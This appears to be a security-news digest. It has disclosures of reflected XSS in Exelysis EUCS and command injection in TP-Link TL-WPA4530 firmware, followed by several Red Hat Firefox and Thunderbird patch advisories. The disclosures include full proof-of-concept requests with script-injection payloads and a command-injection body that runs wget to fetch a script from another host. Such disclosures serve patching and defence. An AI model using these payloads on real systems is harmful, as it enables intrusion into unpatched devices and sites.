Cross Site Scripting vulnerability found in Exelysis Unified Communication Solution (EUCS) v.1.0 allows a remote attacker to gain privileges via the URL path of the eucsAdmin login web page.

Reflected XSS (Cross-Site Scripting) attacks

Type: Unauthenticated Remote attacks

We have identified that the “eucsAdmin login” web page of “Exelysis Unified Communication Solution (EUCS)” product is vulnerable to "Reflective" Cross-site scripting (XSS) at two injection points. This is due to that the Web App fails to adequately sanitize request strings of malicious JavaScript. By leveraging this issue, an attacker is able to cause arbitrary HTML and JavaScript code to be executed in a user's browser within the security context of the affected site. This attack can be used in conjunction with a social engineering techniques.

Reflected XSS in URL Path - CVE-2023-29837

\------------------------------------------

Request:

GET /login.php/%22%3E%3Cscript%3Ealert(%22IthacaLabs%22)%3C/script%3E%22%3Cform%20name=%22form%22%20action=%22/login.php HTTP/1.1

Host: 1.1.1.1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: close

Cookie: redirect=1; testing=1; PHPSESSID=something

Upgrade-Insecure-Requests: 1

Sec-Fetch-Dest: document

Sec-Fetch-Mode: navigate

Sec-Fetch-Site: none

Sec-Fetch-User: ?1

Affected Code:

<form name="form" action="/login.php/"><script>alert("IthacaLabs")</script>"<form name="form" action="/login.php" method="post" target="\_self" class="form-horizontal" style="margin-bottom: 0px !important;">

Reflected XSS in Username Parameter - CVE-2023-29836

\----------------------------------------------------

Request:

POST /\_/login.php HTTP/1.1

Host: 1.1.1.1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 90

Origin: https://1.1.1.1

Connection: close

Referer: https://1.1.1.1/\_/login.php

Cookie: redirect=1; testing=1; PHPSESSID=something

Upgrade-Insecure-Requests: 1

Sec-Fetch-Dest: document

Sec-Fetch-Mode: navigate

Sec-Fetch-Site: same-origin

Sec-Fetch-User: ?1

username=test"><script>alert("XSSbyIthacaLabs");</script><input id="username&password=test

Affected Code:

<input id="username" name="username" type="text" class="form-control" placeholder="Username" value="test"><script>alert("XSSbyIthacaLabs");</script><input id="username">

CVE-2023-29837: Exelysis/EUCS Admin Login XSS_CVE-2023-29836_CVE-2023-29837.txt at main · IthacaLabs/Exelysis

TP-Link TL-WPA4530 KIT V2 (EU)_170406 and V2 (EU)_161115 is vulnerable to Command Injection via _httpRpmPlcDeviceRemove.

Permalink

Cannot retrieve contributors at this time

**TP-Link TL-WPA4530 V2 Vulnerability**

Several command injection vulnerabilities are found in the latest version of TL-WPA4530 V2 firmware

**Vulnerability Description**

*   Reference Firmware: URL
*   Binary Path: /usr/bin/httpd
*   Entry Url: /admin/powerline
*   Affected Versions
    *   TL-WPA4530 V2 (EU)\_170406
    *   TL-WPA4530 V2 (EU)\_161115

There is a command injection vulnerability in function _httpRpmPlcDeviceAdd and _httpRpmPlcDeviceRemove. After authentication, an attacker can set devicePwd or key field in requests to launch a remote-code-execution attack.

**PoC**

PoC for triggering _httpRpmPlcDeviceAdd

    POST /admin/powerline?form=plc_add HTTP/1.1
    Host: 192.168.100.2
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:92.0) Gecko/20100101 Firefox/92.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 68
    Origin: http://192.168.100.2
    Connection: close
    Referer: http://192.168.100.2/
    Cookie: Authorization=XXXXXXX
    
    xxxxxxxxxxxxxxxxxxxxxxxxxx;wget http://192.168.100.254:8000/net.sh;

CVE-2023-31701: IoT-Vulns/report.md at main · FirmRec/IoT-Vulns

Red Hat Security Advisory 2023-3141-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 102.11.0 ESR. Issues addressed include a bypass vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2023:3141-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3141  
Issue date:        2023-05-16  
CVE Names:         CVE-2023-32205 CVE-2023-32206 CVE-2023-32207  
                   CVE-2023-32211 CVE-2023-32212 CVE-2023-32213  
                   CVE-2023-32215  
====================================================================  
1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 8.6  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.8.6) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 102.11.0 ESR.

Security Fix(es):

* Mozilla: Browser prompts could have been obscured by popups  
(CVE-2023-32205)

* Mozilla: Crash in RLBox Expat driver (CVE-2023-32206)

* Mozilla: Potential permissions request bypass via clickjacking  
(CVE-2023-32207)

* Mozilla: Memory safety bugs fixed in Firefox 113 and Firefox ESR 102.11  
(CVE-2023-32215)

* Mozilla: Content process crash due to invalid wasm code (CVE-2023-32211)

* Mozilla: Potential spoof due to obscured address bar (CVE-2023-32212)

* Mozilla: Potential memory corruption in FileReader::DoReadData()  
(CVE-2023-32213)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2196736 - CVE-2023-32205 Mozilla: Browser prompts could have been obscured by popups  
2196737 - CVE-2023-32206 Mozilla: Crash in RLBox Expat driver  
2196738 - CVE-2023-32207 Mozilla: Potential permissions request bypass via clickjacking  
2196740 - CVE-2023-32211 Mozilla: Content process crash due to invalid wasm code  
2196741 - CVE-2023-32212 Mozilla: Potential spoof due to obscured address bar  
2196742 - CVE-2023-32213 Mozilla: Potential memory corruption in FileReader::DoReadData()  
2196753 - CVE-2023-32215 Mozilla: Memory safety bugs fixed in Firefox 113 and Firefox ESR 102.11

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.6):

Source:  
firefox-102.11.0-2.el8_6.src.rpm

aarch64:  
firefox-102.11.0-2.el8_6.aarch64.rpm  
firefox-debuginfo-102.11.0-2.el8_6.aarch64.rpm  
firefox-debugsource-102.11.0-2.el8_6.aarch64.rpm

ppc64le:  
firefox-102.11.0-2.el8_6.ppc64le.rpm  
firefox-debuginfo-102.11.0-2.el8_6.ppc64le.rpm  
firefox-debugsource-102.11.0-2.el8_6.ppc64le.rpm

s390x:  
firefox-102.11.0-2.el8_6.s390x.rpm  
firefox-debuginfo-102.11.0-2.el8_6.s390x.rpm  
firefox-debugsource-102.11.0-2.el8_6.s390x.rpm

x86_64:  
firefox-102.11.0-2.el8_6.x86_64.rpm  
firefox-debuginfo-102.11.0-2.el8_6.x86_64.rpm  
firefox-debugsource-102.11.0-2.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-32205  
https://access.redhat.com/security/cve/CVE-2023-32206  
https://access.redhat.com/security/cve/CVE-2023-32207  
https://access.redhat.com/security/cve/CVE-2023-32211  
https://access.redhat.com/security/cve/CVE-2023-32212  
https://access.redhat.com/security/cve/CVE-2023-32213  
https://access.redhat.com/security/cve/CVE-2023-32215  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZGQXf9zjgjWX9erEAQiGJQ/+IbXk9s0LKLKZbhDerprRsgqOPXJIck0q  
eg1ZbODSbva9/Dj9Kq20hlxaYWAByAnoXz6M0r1jq+0GNu9yTpE0JOmxjonU8TPi  
ECXQ/UhERsjukGKM4RER6UvUeJfR40XHz679hiAMJ60AukkxXCw7lifGc1LHpdHk  
eWSHIC+t61sllmjCYTznjyFOm77oJiu4+l7U06m5CdCeA6w0VnXTQa25qrwzcqqK  
q02WTSvFhsQpcrF5zXSTjv9ft90lK92kn3b/LHwSHnGfOsi8nU9W7MrriVU+xRRY  
mkc09mABk3lizEUSSVszLW/Kai4twE2R8tArQ8GMzQL8RbLb8f0BOElWLdJUIIcp  
HJgXeAzI/1OMBUF6DMLruoZBUPu9VZfSAbbJjMOIrkblKKfDjBSV/tyuYhxnKVSI  
iFkZEAcnR1dTBHESf1NlAoJDJQPRbL6MfJN7kDyTHibyHeyogo2m09NnbC8RAnHh  
ajRGXuT+AjTSQbZ4fSsCEMQUBT3p+yMqxgeMbXGsHSZwKIMjFqbcHVKCdC690Hax  
KUK7Z8df0/GitY09CtUwe+/ixOqbEdBemhJdOtWizWoIZkqMez1EIKfGGzq30y7L  
bb48BRYyTEO/Hu8PRiUrZMCg/jucsxlEM6zfIXe83ixFbtk4yII6m3pMN/+R2OFN  
xTYEXUTCJdA=iQXv  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3141-01

Red Hat Security Advisory 2023-3154-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 102.11.0. Issues addressed include a bypass vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2023:3154-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3154  
Issue date:        2023-05-16  
CVE Names:         CVE-2023-32205 CVE-2023-32206 CVE-2023-32207  
                   CVE-2023-32211 CVE-2023-32212 CVE-2023-32213  
                   CVE-2023-32215  
====================================================================  
1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 8.4  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.8.4) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 102.11.0.

Security Fix(es):

* Mozilla: Browser prompts could have been obscured by popups  
(CVE-2023-32205)

* Mozilla: Crash in RLBox Expat driver (CVE-2023-32206)

* Mozilla: Potential permissions request bypass via clickjacking  
(CVE-2023-32207)

* Mozilla: Memory safety bugs fixed in Firefox 113 and Firefox ESR 102.11  
(CVE-2023-32215)

* Mozilla: Content process crash due to invalid wasm code (CVE-2023-32211)

* Mozilla: Potential spoof due to obscured address bar (CVE-2023-32212)

* Mozilla: Potential memory corruption in FileReader::DoReadData()  
(CVE-2023-32213)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2196736 - CVE-2023-32205 Mozilla: Browser prompts could have been obscured by popups  
2196737 - CVE-2023-32206 Mozilla: Crash in RLBox Expat driver  
2196738 - CVE-2023-32207 Mozilla: Potential permissions request bypass via clickjacking  
2196740 - CVE-2023-32211 Mozilla: Content process crash due to invalid wasm code  
2196741 - CVE-2023-32212 Mozilla: Potential spoof due to obscured address bar  
2196742 - CVE-2023-32213 Mozilla: Potential memory corruption in FileReader::DoReadData()  
2196753 - CVE-2023-32215 Mozilla: Memory safety bugs fixed in Firefox 113 and Firefox ESR 102.11

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.4):

Source:  
thunderbird-102.11.0-1.el8_4.src.rpm

aarch64:  
thunderbird-102.11.0-1.el8_4.aarch64.rpm  
thunderbird-debuginfo-102.11.0-1.el8_4.aarch64.rpm  
thunderbird-debugsource-102.11.0-1.el8_4.aarch64.rpm

ppc64le:  
thunderbird-102.11.0-1.el8_4.ppc64le.rpm  
thunderbird-debuginfo-102.11.0-1.el8_4.ppc64le.rpm  
thunderbird-debugsource-102.11.0-1.el8_4.ppc64le.rpm

s390x:  
thunderbird-102.11.0-1.el8_4.s390x.rpm  
thunderbird-debuginfo-102.11.0-1.el8_4.s390x.rpm  
thunderbird-debugsource-102.11.0-1.el8_4.s390x.rpm

x86_64:  
thunderbird-102.11.0-1.el8_4.x86_64.rpm  
thunderbird-debuginfo-102.11.0-1.el8_4.x86_64.rpm  
thunderbird-debugsource-102.11.0-1.el8_4.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-32205  
https://access.redhat.com/security/cve/CVE-2023-32206  
https://access.redhat.com/security/cve/CVE-2023-32207  
https://access.redhat.com/security/cve/CVE-2023-32211  
https://access.redhat.com/security/cve/CVE-2023-32212  
https://access.redhat.com/security/cve/CVE-2023-32213  
https://access.redhat.com/security/cve/CVE-2023-32215  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZGQXkdzjgjWX9erEAQjuShAAkWX1DSw3Bmb5UQn4/AmVHwBNP3Iduf6L  
l9K0TPID9emj5PFXmatAooRp0G8GpCbdFhnan75SYmhSFu692gIXQ8BskfA94BMV  
7T65knnLu18HX5G/tn7KAVI5WGz7YeL6kf/V9QS5S8WHx7NjUMqmbyCqXVMbjk1F  
DSFtEBbnYb3vzmzC3/zBoRWJ6417v/I3jjLaGYpuCNuVULfMImsfEAXNHGYg6bor  
om/EYGrbTCERFp/m93wBDisKCN5ZsWcwF80xlZNhxp19F5jp38YcyYJNRiT7h4yy  
j/2nn9fEl7yaCJxJL67sNXnkNOpFX9iu3pPmSDmWxiIm8Bups0FrwyMN8DVpMjR0  
1R7pdyuZZ2UHyEf2cqgbOmvOUXKWbSMcUa/QhQnPYn85/9X5XMm7e9AYlm3c9D83  
HB8ot69f1386XXgm55YY7aFI3M90EWc8XryZmqTAVCl6iWCfgPLUoekjvs9aOZcf  
VA0oF/vpIK0VDldgB+7Y/weaZjvy7jdLibzWHlfboRVGz67UispcTARTEAHWOicj  
+izOVINgCz2z8uqrMzE1JXZDondx0ODkyCzJo09oNyW+T6dPHuypkW5SuNk+I+gZ  
qDs4OGEFXVNZXJI6cs6MbyFDJL09U1HenrXySi4sCOfVBNLtdowXowGvszyAEtC0  
gQ+czWiDOnE=5rLU  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3154-01

Red Hat Security Advisory 2023-3155-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 102.11.0. Issues addressed include a bypass vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2023:3155-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3155  
Issue date:        2023-05-16  
CVE Names:         CVE-2023-32205 CVE-2023-32206 CVE-2023-32207  
                   CVE-2023-32211 CVE-2023-32212 CVE-2023-32213  
                   CVE-2023-32215  
====================================================================  
1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 8.6  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.8.6) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 102.11.0.

Security Fix(es):

* Mozilla: Browser prompts could have been obscured by popups  
(CVE-2023-32205)

* Mozilla: Crash in RLBox Expat driver (CVE-2023-32206)

* Mozilla: Potential permissions request bypass via clickjacking  
(CVE-2023-32207)

* Mozilla: Memory safety bugs fixed in Firefox 113 and Firefox ESR 102.11  
(CVE-2023-32215)

* Mozilla: Content process crash due to invalid wasm code (CVE-2023-32211)

* Mozilla: Potential spoof due to obscured address bar (CVE-2023-32212)

* Mozilla: Potential memory corruption in FileReader::DoReadData()  
(CVE-2023-32213)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2196736 - CVE-2023-32205 Mozilla: Browser prompts could have been obscured by popups  
2196737 - CVE-2023-32206 Mozilla: Crash in RLBox Expat driver  
2196738 - CVE-2023-32207 Mozilla: Potential permissions request bypass via clickjacking  
2196740 - CVE-2023-32211 Mozilla: Content process crash due to invalid wasm code  
2196741 - CVE-2023-32212 Mozilla: Potential spoof due to obscured address bar  
2196742 - CVE-2023-32213 Mozilla: Potential memory corruption in FileReader::DoReadData()  
2196753 - CVE-2023-32215 Mozilla: Memory safety bugs fixed in Firefox 113 and Firefox ESR 102.11

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.6):

Source:  
thunderbird-102.11.0-1.el8_6.src.rpm

aarch64:  
thunderbird-102.11.0-1.el8_6.aarch64.rpm  
thunderbird-debuginfo-102.11.0-1.el8_6.aarch64.rpm  
thunderbird-debugsource-102.11.0-1.el8_6.aarch64.rpm

ppc64le:  
thunderbird-102.11.0-1.el8_6.ppc64le.rpm  
thunderbird-debuginfo-102.11.0-1.el8_6.ppc64le.rpm  
thunderbird-debugsource-102.11.0-1.el8_6.ppc64le.rpm

s390x:  
thunderbird-102.11.0-1.el8_6.s390x.rpm  
thunderbird-debuginfo-102.11.0-1.el8_6.s390x.rpm  
thunderbird-debugsource-102.11.0-1.el8_6.s390x.rpm

x86_64:  
thunderbird-102.11.0-1.el8_6.x86_64.rpm  
thunderbird-debuginfo-102.11.0-1.el8_6.x86_64.rpm  
thunderbird-debugsource-102.11.0-1.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-32205  
https://access.redhat.com/security/cve/CVE-2023-32206  
https://access.redhat.com/security/cve/CVE-2023-32207  
https://access.redhat.com/security/cve/CVE-2023-32211  
https://access.redhat.com/security/cve/CVE-2023-32212  
https://access.redhat.com/security/cve/CVE-2023-32213  
https://access.redhat.com/security/cve/CVE-2023-32215  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZGQXqtzjgjWX9erEAQgLGw/+Nms5Ev0EIc+b4UVd1YnUR5FFjvNXquvt  
WR9NpsXrjMMjQQ5kHZCcvSopeWsWA0G2uCa7vY/8MMCQvXU+8gN1J1QaqbAsIQmK  
azKRn5B1pemKMW98XyxnOO9J6u0N+zBrLnLFYTuWVPZwTqZjRJ+MIv2cMQM3vM+2  
1N+5ElLTNVzkExNBro8ylOGZthcAqAMVYXpf2hDW0JZoToJA3toMjXwdjiJcewmg  
VSFi6iM8KaYepUkwDOPRg/GyzTd6mNe+kaLgLHs46Z3CN8pT3r05kftHLF7Qh2Ua  
qIpPRjqW9I88YFRF1dgxk45I6CcGDoCTDjWYW8c28nOKO9Ntop/XqIZTyKjgZjpW  
DKINKnpru38Xn9+ilkSLL3MI3FQMcI/3bZMIFH/BtiQbu4pPiWeysmP2BiRP8sRm  
I1D7mcavFG5o3k0xnW8/AwMx2es+4TuQnIXz70b0tW/U8TrbW3HWWtQA3Sba+nHe  
zF+AoMjJ4UxlPY0EE1EQ6/M0adp3niumP15Xy625ywXdN4toyra1MBsBqJcx3AiZ  
1jyK1TTgzMCBkftw/96ojdGTU5JiFfHSb0l4uONykI1sw79AhmzjFvrC1xn5L4Kj  
k1V4jhsLx74BWG7++TGwUyxkTXSucu0qxHtAv7KhxmiELs/9qVt58zA+p3wjO/z4  
RF3PcjF94kw=fLdi  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3155-01

Red Hat Security Advisory 2023-3142-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 102.11.0 ESR. Issues addressed include a bypass vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2023:3142-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3142  
Issue date:        2023-05-16  
CVE Names:         CVE-2023-32205 CVE-2023-32206 CVE-2023-32207  
                   CVE-2023-32211 CVE-2023-32212 CVE-2023-32213  
                   CVE-2023-32215  
====================================================================  
1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 9.0  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.9.0) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 102.11.0 ESR.

Security Fix(es):

* Mozilla: Browser prompts could have been obscured by popups  
(CVE-2023-32205)

* Mozilla: Crash in RLBox Expat driver (CVE-2023-32206)

* Mozilla: Potential permissions request bypass via clickjacking  
(CVE-2023-32207)

* Mozilla: Memory safety bugs fixed in Firefox 113 and Firefox ESR 102.11  
(CVE-2023-32215)

* Mozilla: Content process crash due to invalid wasm code (CVE-2023-32211)

* Mozilla: Potential spoof due to obscured address bar (CVE-2023-32212)

* Mozilla: Potential memory corruption in FileReader::DoReadData()  
(CVE-2023-32213)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2196736 - CVE-2023-32205 Mozilla: Browser prompts could have been obscured by popups  
2196737 - CVE-2023-32206 Mozilla: Crash in RLBox Expat driver  
2196738 - CVE-2023-32207 Mozilla: Potential permissions request bypass via clickjacking  
2196740 - CVE-2023-32211 Mozilla: Content process crash due to invalid wasm code  
2196741 - CVE-2023-32212 Mozilla: Potential spoof due to obscured address bar  
2196742 - CVE-2023-32213 Mozilla: Potential memory corruption in FileReader::DoReadData()  
2196753 - CVE-2023-32215 Mozilla: Memory safety bugs fixed in Firefox 113 and Firefox ESR 102.11

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.9.0):

Source:  
firefox-102.11.0-2.el9_0.src.rpm

aarch64:  
firefox-102.11.0-2.el9_0.aarch64.rpm  
firefox-debuginfo-102.11.0-2.el9_0.aarch64.rpm  
firefox-debugsource-102.11.0-2.el9_0.aarch64.rpm

ppc64le:  
firefox-102.11.0-2.el9_0.ppc64le.rpm  
firefox-debuginfo-102.11.0-2.el9_0.ppc64le.rpm  
firefox-debugsource-102.11.0-2.el9_0.ppc64le.rpm

s390x:  
firefox-102.11.0-2.el9_0.s390x.rpm  
firefox-debuginfo-102.11.0-2.el9_0.s390x.rpm  
firefox-debugsource-102.11.0-2.el9_0.s390x.rpm

x86_64:  
firefox-102.11.0-2.el9_0.x86_64.rpm  
firefox-debuginfo-102.11.0-2.el9_0.x86_64.rpm  
firefox-debugsource-102.11.0-2.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-32205  
https://access.redhat.com/security/cve/CVE-2023-32206  
https://access.redhat.com/security/cve/CVE-2023-32207  
https://access.redhat.com/security/cve/CVE-2023-32211  
https://access.redhat.com/security/cve/CVE-2023-32212  
https://access.redhat.com/security/cve/CVE-2023-32213  
https://access.redhat.com/security/cve/CVE-2023-32215  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZGQXiNzjgjWX9erEAQiRXBAAiVIUbn7dOf2NutaLOvipz864YOInXgvg  
DBBWDy4c5i7SlkDPst2YcxDnhKv4k9aj9HUDcNEL8eYgSR6l7brPPj2SSMQdlfCe  
gc0F0E6kHqPzkZ8EO4OCjQHUCfYYKlHRWCqCXRpYYCL0At9XZsk2Br1NsSqnRk3H  
lh9uGVrq56NJcJwjQHKVDrN/jXTDGTzPgqyLMmIUiVh5eTipYnkisRIEAjhRK9Rz  
MDeoIBdywRk6W4uKpNBtj2Q4CdiHJ2RNTjFvtdpYzxUqCdRp1/9G7hz/LRwR8Hnc  
k83snO3fALH46af/hLFej1GZir3EhpG8zJMkOqxtivGd+ly36Ba1iEOeodUxYGh1  
ebjmdj2dGWsaedhxwMy2hDWMoVjXu4629VpnuSJdsxptTxraMGGkyZB0TRSMAGEZ  
NiXXLEUGVWqgq8dOii4vefq75IzSXGUwPguts0jUpxLJG2RhA1M+Uqu0UH7MPdOB  
UKGu+mW5eRHBs62v8ntu6kG6qMw4LpAKAX0Yc/2vBsqJqMaXjoHN5tmrl9oUQKvj  
7FtoaTGl+2RF9zLKUi2LSeQrTws92duNWomoAY8DC6ks0PS0zmLXi8OnX/PLIl6q  
zGo+wLaUqOv+lZmSYx/r58e1pFQoaHvsbPO1yy49s8mUlXS18HmMDVyraiBEnMsC  
6uKZMJvihQI=G9dm  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3142-01

Red Hat Security Advisory 2023-3152-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 102.11.0. Issues addressed include a bypass vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2023:3152-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3152  
Issue date:        2023-05-16  
CVE Names:         CVE-2023-32205 CVE-2023-32206 CVE-2023-32207  
                   CVE-2023-32211 CVE-2023-32212 CVE-2023-32213  
                   CVE-2023-32215  
====================================================================  
1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 8.1  
Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream E4S (v. 8.1) - ppc64le, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 102.11.0.

Security Fix(es):

* Mozilla: Browser prompts could have been obscured by popups  
(CVE-2023-32205)

* Mozilla: Crash in RLBox Expat driver (CVE-2023-32206)

* Mozilla: Potential permissions request bypass via clickjacking  
(CVE-2023-32207)

* Mozilla: Memory safety bugs fixed in Firefox 113 and Firefox ESR 102.11  
(CVE-2023-32215)

* Mozilla: Content process crash due to invalid wasm code (CVE-2023-32211)

* Mozilla: Potential spoof due to obscured address bar (CVE-2023-32212)

* Mozilla: Potential memory corruption in FileReader::DoReadData()  
(CVE-2023-32213)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2196736 - CVE-2023-32205 Mozilla: Browser prompts could have been obscured by popups  
